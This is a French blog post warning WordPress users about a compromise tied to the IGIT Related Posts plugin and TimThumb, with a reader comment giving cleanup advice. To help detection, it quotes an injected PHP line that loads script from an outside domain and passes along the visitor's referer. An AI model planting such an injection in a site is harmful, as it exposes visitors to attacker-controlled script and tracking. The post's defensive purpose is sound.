Alerte de sécurité sur un plugin : IGIT Related Posts With Thumb Image After Posts
Vincent vient de nous faire part d’une faille de sécurité sur un plugin Related Posts de IGIT, qui utilise des petites vignettes pour illustrer les billets relatifs. Vous pouvez aller voir dans son billet (vincentabry.com) à l’heure actuelle, son site est planté et j’espère qu’il va se rétablir bientôt.
la page du plugin pour infomation
c’est exactement le même problème que j’ai eu avec mes thèmes de chez Eleganthèmes lié à un problème avec Timthumb ! (attention je ne fais que répèter ce que je lis à droite à gauche.
Ce que j’ai compris c’est qu’il faut désinstaller le plugin immédiatement et ensuite aller dans le début de la page index.php pour regarder si on a pas une script de ce type.
echo ‘<script type=”text/javascript” language=”javascript” src=”http://superpuperdomain.com/count.php?ref=’.urlencode($_SERVER['HTTP_REFERER']) .’”></script>’;
Comme je n’ai pas été affécté et que le site de vincent est hs, voilà deux autres sources qui peuvent vous inspirer
http://wordpress.org/attention-igit-related-posts-with-thumb-image-after-posts-phpremoteview-attack
http://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/
http://www.maistrafego.pt/wordpress-vulnerabilidade-timthumb-igit-related-posts
En tout cas, c’est assez urgent,
Vous allez aimer aussi:
il y a 1 Commentaire jusqu'à maintenant
August 8th, 2011 at 2:10 pm
De retour en ligne. Par contre je conseille de carrément ré-installé WordPress car l’attaque insère plusieurs fichiers à plusieurs endroits. En espérant qu’il y en ait pas dans les uploads (vu qu’on touche pas à ca en cas de mise à jour).
Ensuite peut etre un rapide coup d’oeil dans les fichiers du thème.
Par contre si on plein de plugins et anciens thèmes encore présents sous FTP il vaut mieux vérifier qu’aucun d’entre eux ne contienne timthumb.php ou demander au gentil hébergeur qu’il checke automatiquement
Partagez vos idées, laissez un commentaire!